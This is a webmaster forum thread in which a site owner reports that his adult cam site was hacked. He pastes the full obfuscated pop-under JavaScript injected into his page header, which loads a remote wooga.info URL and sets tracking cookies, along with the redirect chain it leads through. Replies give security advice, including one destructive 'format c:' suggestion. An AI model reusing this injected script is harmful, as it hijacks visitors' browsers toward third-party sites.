Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
06-17-2017, 12:25 AM | #1 |
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 2,925
|
Damn, Got my site hacked again.
The site is bestfreecamgirls.com.
I noticed pop-ups. Using dreamhost shared hosting. Filezilla to access my files. Not using wordpress. Using code I wrote myself. Should I try vps instead? Something other than filezilla? I found this in my header. Code:
<script>function J(K,A){function g(){try{C=Math[(String.fromCharCode(0x66,0154,0x6f,111,114))](document[((function () { var M="e",e="ooki",u="c"; return u+e+M })())][((function () { var n$="t",FK="i",fe="sp",R="l"; return fe+R+FK+n$ })())](f+String.fromCharCode(0x4a,101,0x64,61))['g'.length][(String.fromCharCode(115,112,0x6c,105,0164))](String.fromCharCode(0x3b))[('SGmyvkMN'.length-8)]);} catch(K){};return p<=C||document[((function () { var yc="e",t="i",E="cook"; return E+t+yc })())][(String.fromCharCode(0x69,0156,0144,0x65,0x78,79,102))](f+String.fromCharCode(61))!==-'X'.length;}function I(K,A,b,Y,n,c){if(g())return;var H=String.fromCharCode(0x74,111,0157,0154,0142,97,0162,0x3d,0156,111,0x2c,115,99,0162,0x6f,0154,0154,0142,0x61,114,0x73,0x3d,0x79,0145,0x73,44,0x6c,111,99,97,116,0x69,111,110,0x3d,0171,0145,115,44,0x73,0164,97,0164,0165,0x73,98,0141,114,0x3d,0171,0145,0163,0x2c,109,101,0156,117,98,0x61,0x72,0x3d,110,0x6f,0x2c,0162,0x65,115,105,0172,0x61,98,0154,0x65,0x3d,0x31,054,119,0x69,100,0x74,0150,075)+b[((function () { var X="ing",mV="toStr"; return mV+X })())]()+String.fromCharCode(0x2c,0150,101,0151,0147,104,0164,61)+Y[((function () { var kn="ing",l="oStr",t="t"; return t+l+kn })())]()+String.fromCharCode(0x2c,0x73,99,0x72,101,101,0156,88,61)+n+String.fromCharCode(0x2c,0x73,0x63,0x72,0145,0145,0x6e,0x59,0x3d)+c;document[(String.fromCharCode(111,0156,0143,0x6c,0x69,99,0153))]=function(){if(g())return;window[((function () { var mW="n",v="e",h="op"; return h+v+mW })())](String.fromCharCode(0x6a,97,118,97,0163,99,114,105,0160,0x74,58,0x77,0151,110,0x64,0157,0x77,46,102,111,0x63,0165,0x73,0x28,051,0x3b),String.fromCharCode(0137,0x73,0145,0x6c,0x66),"");m=d[((function () { var gy="ndow",ME="i",Yf="w"; return Yf+ME+gy })())][((function () { var v_="en",hU="p",TY="o"; return TY+hU+v_ })())](K,A,H);if(m){var b=new Date();document[((function () { var Fx="kie",fC="o",q="c",HH="o"; return q+HH+fC+Fx })())]=f+(function () { var k="pires=",Al="1;ex",r="="; return r+Al+k })()+new Date(b[(String.fromCharCode(0x73,101,116,0124,105,0155,0x65))](b[(String.fromCharCode(0x67,0x65,0164,84,105,0x6d,101))]()+z))[(String.fromCharCode(0164,111,0x47,0115,0x54,0x53,0164,114,105,110,103))]()+(function () { var Ww="=/",zk="h",gG=";pat"; return gG+zk+Ww })();b=new Date();document[(String.fromCharCode(0x63,0x6f,0157,0x6b,105,0145))]=f+(function () { var DQ="d=",_="Je"; return _+DQ })()+(C+'x'.length)+String.fromCharCode(59,0145,0170,112,0x69,0x72,0x65,0x73,61)+new Date(b[(String.fromCharCode(0163,0x65,0164,0x54,0x69,0x6d,0145))](b[((function () { var Z="e",ZO="im",dT="getT"; return dT+ZO+Z })())]()+('U'.length*('d'.length*60105+8594)+15901)*(0.0+01750)))[((function () { var Q="ring",B="t",N="toGMTS"; return N+B+Q })())]()+(function () { var S="/",jN="th=",$6=";",u="pa"; return $6+u+jN+S })();O();}};}function O(){try{m[((function () { var N="r",xx="u",Iv="b",Mo="l"; return Iv+Mo+xx+N })())]();m[((function () { var td="r",Oo="pene",o="o"; return o+Oo+td })())][((function () { var v="ow",V="wind"; return V+v })())][(String.fromCharCode(0x66,111,0x63,0165,0x73))]();window[(String.fromCharCode(0163,0145,0x6c,0x66))][(String.fromCharCode(119,0151,110,0x64,0x6f,0167))][(String.fromCharCode(0142,0x6c,0x75,0x72))]();window[(String.fromCharCode(102,0157,0143,0165,0x73))]();if(x[(String.fromCharCode(102,0x69,0162,0145,0146,111,120))])s();if(x[((function () { var k="it",l="webk"; return l+k })())])a();} catch(K){}}function s(){var K=window[(String.fromCharCode(0157,0x70,101,0x6e))](String.fromCharCode(97,98,111,0165,0164,072,0142,108,0141,110,0x6b));K[((function () { var Ho="cus",bc="o",u="f"; return u+bc+Ho })())]();K[((function () { var Mt="se",v="clo"; return v+Mt })())]();}function a(){var K=document[(String.fromCharCode(0143,0x72,101,97,0x74,101,0105,0x6c,0x65,0x6d,101,110,116))](String.fromCharCode(0x61));K[(String.fromCharCode(104,0162,0145,102))]=String.fromCharCode(0141,98,0x6f,0x75,0164,072,98,108,0x61,110,0153);K[(String.fromCharCode(116,97,114,0147,101,0164))]=String.fromCharCode(0150,101,0x6c,0160,101,0162);document[((function () { var ug="Name",Z="ByTag",q="getElements"; return q+Z+ug })())](String.fromCharCode(0x62,111,100,121))[('IKlnTroO'.length-8)][((function () { var _e="d",P="ndChil",R="a",r="ppe"; return R+r+P+_e })())](K);K[((function () { var l="de",zi="t",yl="pa",e="No",L="ren"; return yl+L+zi+e+l })())][(String.fromCharCode(0x72,101,0x6d,0x6f,118,0x65,0103,0x68,0151,0154,0144))](K);var A=document[((function () { var F="t",nj="teEven",G="crea"; return G+nj+F })())](String.fromCharCode(0x4d,0x6f,0x75,115,0145,0105,0166,101,0x6e,0x74,115));A[(String.fromCharCode(105,0x6e,0151,116,0x4d,0x6f,0x75,115,101,0x45,0166,101,0x6e,116))](String.fromCharCode(99,108,105,99,0x6b),true,true,window,('nNuai'.length-5),('xSPTbgOBuf'.length-10),('VmvdiKgmO'.length-9),('QL'.length-2),('qnUVb'.length-5),true,false,false,true,('WqoFhp'.length-6),null);K[(String.fromCharCode(0144,0x69,115,112,0x61,0x74,99,0x68,0x45,118,101,0x6e,0x74))](A);window[(String.fromCharCode(111,0160,101,0156))](K[(String.fromCharCode(104,0x72,101,0x66))],K[(String.fromCharCode(0x74,0x61,0162,0x67,0x65,0164))])[(String.fromCharCode(99,0x6c,0157,0163,0145))]();}var d=top!=window[String.fromCharCode(0163,0x65,0154,0x66)]&&typeof top[(String.fromCharCode(0x64,111,0x63,0x75,0x6d,101,110,116))][(String.fromCharCode(0x6c,0x6f,0143,0x61,0164,105,0x6f,110))][((function () { var Z="g",k="n",_="t",i="oStri"; return _+i+k+Z })())]()===(function () { var r="g",l="i",Wm="st",Wl="n",e="r"; return Wm+e+l+Wl+r })()?top:window[(function () { var N="f",X="l",q="se"; return q+X+N })()];var m=null;A=A||{};var b=A[((function () { var lv="me",W="na"; return W+lv })())]||Math[((function () { var o="or",F="lo",G1="f"; return G1+F+o })())](Math[((function () { var V="om",oE="rand"; return oE+V })())]()*(0.0+01750)+'B'.length);var Y=A[((function () { var h="h",U5="dt",bM="w",ME="i"; return bM+ME+U5+h })())]||window[(String.fromCharCode(111,0x75,0x74,101,0162,0127,0151,0x64,116,104))]||window[(String.fromCharCode(0151,0156,110,0145,0x72,87,105,0x64,116,0x68))];var n=A[(String.fromCharCode(104,0x65,105,0x67,104,0x74))]||window[((function () { var kC="ht",v="Heig",D8="o",QY="uter"; return D8+QY+v+kC })())]-(0x2*050+20)||window[((function () { var HP="ght",L="nerHei",o3="in"; return o3+L+HP })())];var c=typeof A[((function () { var zl="eft",T="l"; return T+zl })())]!=(function () { var D="ed",G="n",pN="u",u="ndefi"; return pN+u+G+D })()?A[(String.fromCharCode(0154,0x65,102,0x74))][((function () { var B="ng",OT="tri",l0="t",AK="oS"; return l0+AK+OT+B })())]():window[(String.fromCharCode(115,0143,0162,0x65,0x65,0156,0130))];var H=typeof A[((function () { var R="p",c6="o",oF="t"; return oF+c6+R })())]!=String.fromCharCode(0165,110,100,0x65,0146,0151,0x6e,0145,0x64)?A[(String.fromCharCode(0164,0157,112))][(String.fromCharCode(0x74,0x6f,0123,116,114,105,110,103))]():window[((function () { var w="nY",q2="e",D7="scr",wm="e"; return D7+wm+q2+w })())];var z=A[(String.fromCharCode(0x77,97,105,0164))]||('eB'.length*03135+342);z=z*(0.0+1000);var p=A[(String.fromCharCode(99,0x61,0160))]||'Os'.length;var C=('TIx'.length-3);var f=String.fromCharCode(0x5f,0x70,0157,0164,0x6f,0163);var x=function(){var K=navigator[(String.fromCharCode(0x75,115,101,114,65,0147,0145,0156,0x74))][(String.fromCharCode(0164,0x6f,0x4c,0x6f,119,101,0162,0103,0141,0163,0145))]();var A={"\x77\145\u0062\x6b\x69\x74":/webkit/[(String.fromCharCode(0x74,0x65,115,0x74))](K),"\x6d\157\172\151\u006c\x6c\u0061":/mozilla/[((function () { var Tg="st",cW="te"; return cW+Tg })())](K)&&!/(compatible|webkit)/[((function () { var y="t",KC="es",P="t"; return P+KC+y })())](K),"\143\x68\x72\x6f\x6d\x65":/chrome/[(String.fromCharCode(0x74,101,0163,0164))](K),"\u006d\u0073\151\145":/msie/[((function () { var ZZ="t",t3="s",m2="t",M="e"; return m2+M+t3+ZZ })())](K)&&!/opera/[(String.fromCharCode(116,0x65,0163,0164))](K),"\u0066\151\x72\x65\146\u006f\170":/firefox/[((function () { var aD="st",x_="e",OU="t"; return OU+x_+aD })())](K),"\u0073\x61\u0066\x61\162\x69":/safari/[(String.fromCharCode(116,0x65,115,0x74))](K)&&!/chrome/[(String.fromCharCode(0x74,0145,0x73,0164))](K),"\x6f\u0070\145\x72\x61":/opera/[(String.fromCharCode(0164,0145,0x73,0x74))](K),"\x6d\x6f\x62\151\u006c\145":/mobile|ip(hone|od|ad)|android|blackberry|iemobile|kindle|netfront|silk-accelerated|(hpw|web)os|fennec|minimo|opera m(obi|ini)|blazer|dolfin|dolphin|skyfire|zune/[((function () { var uz="t",L5="tes"; return L5+uz })())](K)};A[(String.fromCharCode(0x76,101,0x72,0x73,0151,0x6f,0x6e))]=A[((function () { var Ko="ri",ff="safa"; return ff+Ko })())]?(K[((function () { var LQ="h",S="tc",Pv="m",U="a"; return Pv+U+S+LQ })())](/.+(?:ri)[\/: ]([\d.]+)/)||[])['E'.length]:(K[(String.fromCharCode(0x6d,0x61,0164,99,0x68))](/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/)||[])['Q'.length];return A;}();I(K,b,Y,n,c,H);};J((function () { var j="e56015a/",$="d0aa122e96ef6453",m="http://wooga.inf",t="o/GpzD/89e"; return m+t+$+j })(),{"\x6e\u0061\u006d\145":String.fromCharCode(112,0x6f,0x70),"\167\x69\144\u0074\u0068":window[(function () { var F="en",d="scre"; return d+F })()][((function () { var N="h",Q="d",a="w",f="t",V="i"; return a+V+Q+f+N })())],"\u0068\145\151\147\x68\x74":window[(function () { var _="een",c="scr"; return c+_ })()][((function () { var qu="t",I="h",G="heig"; return G+I+qu })())],"\u0074\u006f\x70":('iCFu'.length-4),"\154\u0065\x66\164":('LvhX'.length-4),"\x77\u0061\x69\x74":'TWdBLeF'.length*(1*026+2)*(3*021+9)*(1*0x23+25),"\143\x61\u0070":'u'.length}); // menu_potos</script> <meta name="prVerify" content="fa9bbfa833cadb34065b654dc3914ec8" /> <link rel="stylesheet" type="text/css" href="style.css" media="screen"> |
06-17-2017, 01:19 AM | #2 | |
80/20 Rule
Industry Role:
Join Date: Apr 2010
Location: Los Angeles
Posts: 3,050
|
Quote:
Have you scanned your PC for malware? Do you use the same password elsewhere? Have you changed your password to something longer and more complex with lowercase letters, uppercase letters, numbers & special characters? To brute force just an 8-character password utilizing all 4 types (assuming 90+ characters) would require trying over 4 quadrillion (4.30467E+15) potential combinations.
__________________
Support American Heroes | How Bad is My Batch? | Vaccine Deaths & Adverse Reactions | Free Speech Coalition | <WARNING> ePayService / Guerra Capital, INC / MTACC payments | Flirt4Free Fucks their Affiliates | Don't do business with piece of shit Andy Alvarez from Webmaster Central / VR3000, who said: "If it was up to me, they would have shot all 30,000 of those country loving shitheads" |
|
06-17-2017, 01:32 AM | #3 | |||
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 2,925
|
Different things. Mainly cheating cougars.
First link I see is wooga.info/GpzD/89ed0aa122e96ef6453e56015a/ Quote:
Quote:
Quote:
Here is where it happened before. https://gfy.com/fucking-around-and-pr...ript-site.html |
|||
06-17-2017, 01:44 AM | #4 |
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 2,925
|
The script only effected index.php. stat command only shows when the file was last changed. But I already changed it. Looking on google cache, I know the script was on my site on 6/15.
|
06-17-2017, 11:07 PM | #5 |
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 2,925
|
I moved my site to a VPS. Hope this helps. I am hoping it was a flawed site on my shared server and not my site.
Just in case you were curious. Redirect detective shows the following. wooga.info/GpzD/89ed0aa122e96ef6453e56015a/ wmtracer.cn.com/?a=85&c=1692&s1=9248&s2=bf3393854b9dbd1acdec287f09 59ca3d5b41d3c3&s3=2798 yqzjk.imideals.com/c/2332b00a20149287?s1=4816&s2=1222&s5=85&click_id=27 25433 milfalone.com/c/e4a0440f73f4cca4?s1=4816&s2=1222&s3=&s5=85 affiliate.thedatingnetwork.com/tracking/click/v1?site=instanthookups.com&afn=791552&afnPromoCode =1&keyword=4816_1222&tour=bigselector instanthookups.com/dating/bigselector/791574/4816_1222/hash%3D40-1ed84a24be68adbbe1ab46d930913d34%26pixel%3D11690 instanthookups.com/dating/bigselector/791574/4816_1222/hash%3D40-1ed84a24be68adbbe1ab46d930913d34%26pixel%3D11690 instanthookups.com/dating/bigselector |
06-18-2017, 12:29 AM | #6 |
Confirmed User
Industry Role:
Join Date: Mar 2017
Posts: 59
|
I don't really think this was because of shared hosting.
If I have some free minutes, I could check your site against some high-risk security issues, ofc only if you want me to do that. regards
__________________
>> Porn Reviews - PornCrash.com <<
xdooz.com - Quality Porn Site Skype: PornCrash Contact: Use this Form |
06-18-2017, 02:56 AM | #7 |
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 2,925
|
I am cool with that.
|
06-18-2017, 07:18 AM | #8 |
♦ Web Developer ♦
Industry Role:
Join Date: May 2005
Location: Full-Stack Developer
Posts: 12,467
|
You probably have a backdoor somewhere, changing hosts will not solve it mate .
|
06-18-2017, 08:43 AM | #9 |
Say for inflation - YES!
Industry Role:
Join Date: Sep 2015
Location: Russia
Posts: 9,855
|
Not post links here, you will infect users who click them.
What about say log files? |
06-18-2017, 08:50 AM | #10 |
So Fucking Banned
Industry Role:
Join Date: Aug 2013
Location: Princeton, New Jersey
Posts: 4,011
|
Hope the malicious version of that page was not cached.
|
06-18-2017, 08:53 AM | #11 |
你自己去他媽的
Industry Role:
Join Date: Mar 2008
Posts: 23,343
|
You cant trust anyone nowadays
|
06-19-2017, 09:12 PM | #12 |
Confirmed User
Join Date: Dec 2002
Posts: 568
|
Your problem is Filezilla !
Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there. These reload toons of trojans to your local machine and submit all your ftp passwords to the intruders. Hit the format c: button after closing the ftp on your servers. Best Regards |
06-19-2017, 09:29 PM | #13 | |
Confirmed User
Industry Role:
Join Date: Aug 2012
Posts: 898
|
Quote:
|
|
06-20-2017, 01:59 AM | #14 | |
Confirmed User
Industry Role:
Join Date: Jul 2003
Location: Australia
Posts: 5,065
|
Quote:
__________________
Traffic.Tools - 40+ Free Tools Free.Marketing - 150+ Free Tools Submission.Tools - 20+ Free Tools |
|
06-20-2017, 05:02 AM | #15 |
Confirmed User
Industry Role:
Join Date: Nov 2016
Posts: 143
|
Damm Putin.
|
06-20-2017, 09:52 AM | #16 |
emperor of my world
Join Date: Aug 2004
Location: nethalands
Posts: 29,904
|
Good luck.
Some fucking retard is trying to reset the passwords on my wordpress sites. What's the point of that? |
|
|||||||
Bookmarks |
Tags |
var, return, site, function, jk, afunction, header, found, m=e, e=ooki, u=c;, ][function, n$=t, fk=i, fe=sp, r=l;, fe+r+fk+n$, catchk;return, u+e+m, wrote, bestfreecamgirls.com, noticed, pop-ups, hacked, dreamhost, shared, files, damn, wordpress, access, hosting |